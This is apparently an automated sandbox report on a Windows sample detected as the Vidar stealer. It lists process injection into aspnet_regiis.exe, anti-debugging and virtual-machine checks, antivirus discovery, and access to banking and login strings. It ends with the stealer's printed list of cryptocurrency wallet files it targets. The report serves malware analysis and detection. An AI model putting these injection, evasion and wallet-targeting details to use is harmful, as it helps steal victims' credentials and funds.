Code function: 3_2_02A10FBA GetSystemInfo,wsprintfA,

3_2_02A10FBA

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: CFBFHI.3.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware-
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: CFBFHI.3.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: CFBFHI.3.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: CFBFHI.3.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: CFBFHI.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: CFBFHI.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: CFBFHI.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: CFBFHI.3.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: CFBFHI.3.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: CFBFHI.3.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: CFBFHI.3.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: CFBFHI.3.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: CFBFHI.3.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: CFBFHI.3.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: CFBFHI.3.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: CFBFHI.3.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: CFBFHI.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<Q'2
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: CFBFHI.3.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: CFBFHI.3.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: CFBFHI.3.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: CFBFHI.3.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP$
Source: CFBFHI.3.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Amcache.hve.3.dr	Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: CFBFHI.3.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: CFBFHI.3.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: CFBFHI.3.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D5D199C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6D5D199C

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

3_2_02A18950

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A014AD mov eax, dword ptr fs:[00000030h]	3_2_02A014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A014A2 mov eax, dword ptr fs:[00000030h]	3_2_02A014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0148A mov eax, dword ptr fs:[00000030h]	3_2_02A0148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A18599 mov eax, dword ptr fs:[00000030h]	3_2_02A18599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1859A mov eax, dword ptr fs:[00000030h]	3_2_02A1859A

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D5D5010 GetProcessHeap,

0_2_6D5D5010

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5D199C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D5D199C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CD4D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6D5CD4D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CDA02 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D5CDA02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_02A1D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_02A1D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2762E SetUnhandledExceptionFilter,	3_2_02A2762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA9B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6CA9B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA9B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CA9B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CC4AC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D5BABD0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,

0_2_6D5BABD0

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_02A124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_02A1257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A01000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A30000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A3D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C70000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C71000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29B5008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D5CDBC8 cpuid

0_2_6D5CDBC8

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_02A10DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_02A2B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_02A2B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_02A29A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_02A253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_02A2AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_02A2B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_02A2B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetLocaleInfoA,	3_2_02A2E6A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_02A2B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_02A2B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_02A2749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_02A2B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_02A2B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_02A28DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_02A29D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_02A2E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_02A27576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: EnumSystemLocalesA,	3_2_02A2B556

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D5CD64B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6D5CD64B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A10C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

3_2_02A10C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A10D2E GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

3_2_02A10D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
